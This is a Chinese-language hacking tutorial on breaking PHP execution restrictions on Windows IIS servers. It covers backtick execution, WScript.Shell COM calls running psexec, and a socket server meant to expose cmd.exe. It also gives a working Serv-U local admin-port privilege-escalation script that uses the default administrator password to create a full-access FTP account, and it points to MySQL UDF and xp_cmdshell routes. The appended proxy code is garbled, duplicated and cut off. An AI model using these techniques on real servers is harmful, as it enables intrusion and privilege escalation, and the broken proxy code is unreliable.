從WIN2000到WIN XP, 再到WIN2003, MS IIS伺服器安全性的提升是顯而易見的。 在WIN2000中, 一個普通的PHP SHELL便能把它打垮; 在WIN XP, 即使Safe mode = off,你也無法用system() 等函數執行系統命令, 但是我們還能用com()函數進行突破;到WIN 2003,即使IIS 和PHP都是預設安裝,你用system(), com()也可能拿它沒轍。這時候你就得用一些新的方法來進行突破了。
1.disable_functions的突破
在php -4.0.1以上的版本,php.ini裡引入了一項功能disable_functions , 這個功能比較有用,可以用它禁止一些函數。例如在php.ini裡加上disable_functions = passthru exec system popen 那麼在執行這些函數的時候將會提示Warning: system() has been disabled for security reasons,同時程式終止運行。但是也不是沒有辦法執行系統指令了。因為php採用了許多perl的特性,例如還可以用(`)來執行指令,範例程式碼如下:
<?$output = `ls -al`;echo "<pre>$output</pre>";?>
據說這個只有設為safe_mode為on才能避免,但上次我在一台國外的伺服器上使用的時候還是失敗了,人並不是什麼時候都能那麼走運的:)
2、dl()函數的應用
當任何PHP的內部命令執行數和''都無法使用的時候,可以嘗試dl(),該方法只能用於safe mode=off, 因為它在安全模式下是被禁用的。利用dl()你可以直接呼叫W32api 函數,可惜這個擴充已經被移到PECL 函式庫中,且自PHP 5.1.0以下版本起不再被綁定。以下是手冊裡的例子:
// 載入此擴充
dl("php_w32api.dll")
;// 註冊GetTickCount 函數,來自kernel32.dll
w32api_register_function("kernel32.dll",
"GetTickCount",
"long");
//註冊MessageBoxA 函數,來自User32.dll
w32api_register_function("User32.dll",
"MessageBoxA",
"long");
// 取得開機時間資訊
$ticks = GetTickCount();
// 轉換為易於理解的文字
$secs = floor ($ticks / 1000);
$mins = floor($secs / 60);
$hours = floor($mins / 60);
$str = sprintf("You have been using your computer for:".
"rn %d Milliseconds, or rn %d Seconds".
"or rn %d mins orrn %d hours %d mins.",
$ticks,
$secs,
$mins,
$hours,
$ mins - ($hours*60));
// 顯示一個訊息對話框,只有一個OK 按鈕和上面的開機時間文本
MessageBoxA(NULL,
$str,
"Uptime Information",
MB_OK);
?>
可惜我還沒理解透徹dl()和W32api, 所以就不亂舉例子了, 免得誤導讀者。
3、COM 和.Net(Windows)函數的應用
COM(Component Object Model,元件物件模型)是微軟開發的軟體規範,它用於開發物件導向的、編譯好的軟體元件,它允許把軟體抽象化為二進位的部件,主要運用於windows平台。
PHP 的Windows 版本已經內建此擴充模組的支援。無需加載任何附加擴充功能庫即可使用COM函數。它的使用方法類似C++或Java中類別的創建的語法,並把COM的類別名稱當作參數傳遞到建構子。例如使用在PHP中呼叫“WScript.Shell”執行系統指令:
$cmd=” E:/cert/admin/psexec.exe”;
if($com=new COM("WScript.Shell")) echo "yes" ;
if(!$cmd1=$com->exec($cmd))
{
echo "can not exec()";
}
if(!$cmd2=$cmd1->stdout())
{
echo "can not stdout() ";
}
if(!$cmd3=$cmd2->readall())
{
echo "can not readall()";
}
echo $cmd3;
?>
圖1是我寫的一個執行psexec.exe的一個範例。
這段程式碼與ASP的意思是一模一樣的,當然,你也可以像ASP一樣呼叫“ADODB.Connection”,利用這個元件結合jet2溢位漏洞,可能能夠在PHP Saft mode=ON下拿到一個Shell。
//create the database connection
$conn = new COM("ADODB.Connection");
$dsn = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("mydb.mdb");
$ conn->Open($dsn);
//pull the data through SQL string
$rs = $conn->Execute("select clients from web");
…..
?>
.Net 函數只能運行在PHP 5上,當然,它需要「.Net runtime」的支持,而且這的PHP的一個實驗性模組,功能還未齊全,所以在這就不討論了。
4、Java()函數的應用
此方法適用於safe mode=on。要使用JAVA模組伺服器必須事先安裝Java虛擬機,而且在PHP安裝配置的時候打開了with-java的選項,程式碼如下:
[JAVA]
;這是到php_java.jar的路徑
;java.class.path = . php_java.jar
;JDK的路徑
;Java.home = f:jdk1.3.0
;到虛擬機器的路徑
;Java.library=f:jdk1.3.0jrebinhostspotjvm.dll
同COM一樣,使用Java建立類別(不只是JavaBeans)只要把JAVA的類別名稱當作參數傳遞到建構子。以下是手冊裡邊的例子:
// This example is only intended to be run as a CGI.
$frame = new Java('java.awt.Frame', 'PHP');
$button = new Java('java. awt.Button', 'Hello Java World!');
$frame->add('North', $button);
$frame->validate();
$frame->pack();
$frame->visible = True ;
$thread = new Java('java.lang.Thread');
$thread->sleep(10000);
$frame->dispose();
?>
可惜能真正支援JAVA的PHP伺服器並不多見,所以在這也不多討論了。
5.socket()函數的應用程式
socket 是PHP中功能極為強大的模組,如果你使用高階的、抽象的介面(由fsockopen()和psockopen函數開啟的socket),是不需要開啟“php_sockets.dll”的。但如果要使用完整的socket函數區塊,就必須在php.ini這樣設定:
;Windows Extensions
;Note that MySQL and ODBC support is now built in, so no dll is needed for it.
……..
;去掉以下一句最前邊的分號
;extension=php_sockets.dll
使用PHP的socket函數區塊可以實現連接埠轉送/重定向、封包嗅探、本地溢位等功能, nc能做的, 它大部分都能做到。而且, 還可以用它來建構TCP/UDP伺服器, 同時, 我覺得它也是突破伺服器安全策略的一個最好的方法。以下便是一個在伺服器上開啟連接埠建構TCP伺服器的例子,你可以用它來捆綁上伺服器的cmd.exe:
//在伺服器上建構TCP服務
//該範例需要php_sockets.dll的支援
//執行後便可使用” telnet 127.0.0.1 1020”連接
error_reporting(E_ALL);
/* Allow the script to hang around waiting for connections. */
set_time_limit(0);
/* Turn on liclicit output impushing ee get y implicit
* as it comes in. */
ob_implicit_flush();
//在伺服器上綁定IP和連接埠
$address = '127.0.0.1';
$port = 1020;
if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP) ) < 0) {
echo "socket_create() failed: reason: " . socket_strerror($sock) . "n";
}
if (($ret = socket_bind($sock, $address, $port)) < 0) {
echo "socket_bind() failed: reason: " . socket_strerror($ret) . "n";
}
if (($ret = socket_listen($sock, 5)) < 0) {
echo "socket_listen() failed: reason: " . socket_strerror($ret) . "n";
}
do {
if (($msgsock = socket_accept($sock)) < 0) {
echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . " n";
break;
}
/* Send instructions. */
$msg = "nWelcome to the PHP Test Server. n" .
"To quit, type 'quit'. To shut down the server type 'shutdown'. n";
socket_write($msgsock, $msg, strlen($msg));
do {
if (false === socket_recv($msgsock, $buf , 1024, 0)) {
echo "socket_read() failed: reason: " . socket_strerror($ret) . "n";
break 2;
}
if (!$buf = trim($buf)) {
continue;
}
if ($buf == 'quit') {
break;
}
if ($buf == 'shutdown') {
socket_close($msgsock);
break 2;
}
$talkback = "PHP: You said '$buf'.n";
socket_write($msgsock, $talkback, strlen($talkback));
echo "$bufn";
//以下處理接受到的buf
/*eg:例如
$buf=”cmd.exe /c netstat –an”;
$pp = popen('$buf ', 'r');
While ($read = fgets($pp, 2096))
echo $read;
pclose($pp);
*/
} while (true);
socket_close($msgsock);
} while (true);
socket_close($sock);
?>
事實上,很多主機都是沒有載入php_sockets.dll的,慶幸的是,不需要socket模組支援的「fsockopen」函數已經足夠我們使用了。因為只要有“fsockopen”,我們便可以自由地讀取寫入本機中未對外部開放的連接埠。使用fsockopen讀取寫入serv-u 的本機管理連接埠43958 (註: 此連接埠無法在外部連結) 進行提權是一個很典型的例子:
$adminuser=” LocalAdministrator”;
$adminpass=” #l@$ak# .lk;0@P ”;
$adminport=” 43958”;
$fp = fsockopen ("127.0.0.1",$adminport,$errno, $errstr, 8);
if (!$fp) {
echo "$errstr ( $errno)
n";
} else {
//可以寫入$shellcode
// fputs ($fp, $shellcode);
fputs ($fp, "USER ".$adminuser."rn");
sleep ( 1);
fputs ($fp, "PASS ".$adminpass."rn");
sleep (1);
fputs ($fp, "SITE MAINTENANCErn");
sleep (1);
fputs ( $fp, "-SETUSERSETUPrn");
fputs ($fp, "-IP=".$addr."rn");
fputs ($fp, "-PortNo=".$ftpport." rn");
fputs ($fp, "-User=".$user."rn");
fputs ($fp, "-Password=".$password."rn") ;
fputs ($fp, "-HomeDir=".$homedir."rn");
fputs ($fp, "-LoginMesFile=rn");
fputs ($fp, "-Disable=0 rn");
fputs ($fp, "-RelPaths=0rn");
fputs ($fp, "-NeedSecure=0rn");
fputs ($fp, "-HideHidden=0 rn");
fputs ($fp, "-AlwaysAllowLogin=0rn");
fputs ($fp, "-ChangePassword=1rn");
fputs ($fp, "-QuotaEnable= 0rn");
fputs ($fp, "-MaxUsersLoginPerIP=-1rn");
fputs ($fp, "-SpeedLimitUp=-1rn");
fputs ($fp, " -SpeedLimitDown=-1rn");
fputs ($fp, "-MaxNrUsers=-1rn");
fputs ($fp, "-IdleTimeOut=600rn");
fputs ($ fp, "-SessionTimeOut=-1rn");
fputs ($fp, "-Expire=0rn");
fputs ($fp, "-RatioUp=1rn");
fputs ($fp, "-RatioDown=1rn");
fputs ($fp, "-RatiosCredit=0rn");
fputs ($fp, "-QuotaCurrent=0rn");
fputs ($fp, "-QuotaMaximum=0rn");
fputs ($fp, "-Maintenance=Systemrn");
fputs ($fp, "-PasswordType=Regularrn") ;
fputs ($fp, "-Ratios=Nonern");
fputs ($fp, " Access=".$homedir."|RWAMELCDPrn");
fputs ($fp, "QUITr n");
sleep (1);
while (!feof($fp)) {
echo fgets ($fp,128);
}
}
?>
還可以利用fsockopen編寫HTTP代理,從而訪問外網或本機中無法外部存取的網站。我手上有一個完整的HTTPProxy(圖4),程式碼較長。有興趣的讀者可以看看。
6.MYSQL/MSSQL介面
不同於linux的是,windows下的mysql/MSSQL一般是以系統管理員身分運行的,因此,只要能拿到本機SQL資料庫中的root/sa密碼,你就可以直接用PHP連接資料庫來執行系統指令。
在Mysql中執行系統指令要利用使用者自訂函數「MySQL UDF Dynamic Library」這個漏洞。只要在MSSQL中連接上資料庫,就能直接呼叫「master..xp_cmdshell「擴充執行指令,權限當然是system權限。
總結一下:由於系統、IIS、PHP的版本不一樣,以上提到的幾個突破方法可能會有所變化,PHP還有許多擴展功能是可以利用的,走出system()那幾個系統命令執行函數,你就有可能突破系統安全策略的限制!
後面附上proxy.php的程式碼
error_reporting(E_ALL);
/*
// This program is free software; you can redistribute it and/or
// modify it under the terms of the GNU General Public License
// as published by the Free Software Foundation; either version 2
// of the License, or (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program; received a copy of the GNU General Public License// along with this program; ifif not, write to the Free Software
// Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
//-------------------- -----------------------------------------------
// Class : PHProxy
// Author: ultimategamer00 (Abdullah A.)
// Last Modified: 6:28 PM 6/22/2004
*/
function __stripslashes($str)
{
return get_magic_quotes_gpc() ? stripslashes($str) : $strstr
;
if (!function_exists('str_rot13'))
{
function str_rot13($str)
{
static $alpha = array('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',
nondcqrstuvwxyzABCDEFGHIJKLMNdRST str
, $alpha[0], $alpha[1] );
}
}
class PHProxy
{
var $allowed_hosts = array();
var $version;
var $script_url;
var $url;
var $url_segments;
var $flags = array('include_form' => 1, 'remove_scripts' => 1 , 'accept_cookies' => 1, 'show_images' => 1, 'show_referer' => 1);
var $socket;
var $content_type;
var $request_headers;
var $post_body; var
$response_headers;var $request_headers; var $post_body;
var $response_headers; var $response_body
ftionunction $flags = 'previous')
{
$this->version = '0.2';
$this->script_url = 'http'
. (isset(
function set_request_headers()
{
$headers = " " . (isset($this->url_segments ['query']) ? "?" : '') . " HTTP/1.0rn";
$headers .= "Host: :rn";
$headers .= "User-Agent: Mozilla/ 4.0 (compatible; MSIE 6.0; Windows NT 5.1)rn";
$headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain; q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1rn";
$headers .= "Connection: closer n";
if ($this->flags['show_referer'] == 1)
{
$headers .= "Referer: rn";
}
$cookies = $this->get_cookies();
$headers .= $ cookies != '' ? "Cookie: $cookiesrn" : '';
if (
function set_request_headers()
{
$headers = " " . (isset($this->url_segments['query']) ? "? " : '') . " HTTP/1.0rn";
$headers .= "Host: :rn";
$headers .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)rn";
$headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng ,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1rn";
$headers .= "Connection: closern";
if ($this-> flags['show_referer'] == 1)
{
$headers .= "Referer: rn";
}
$cookies = $this->get_cookies();
$headers .= $cookies != '' ? "Cookie: $cookiesrn" : '';
if (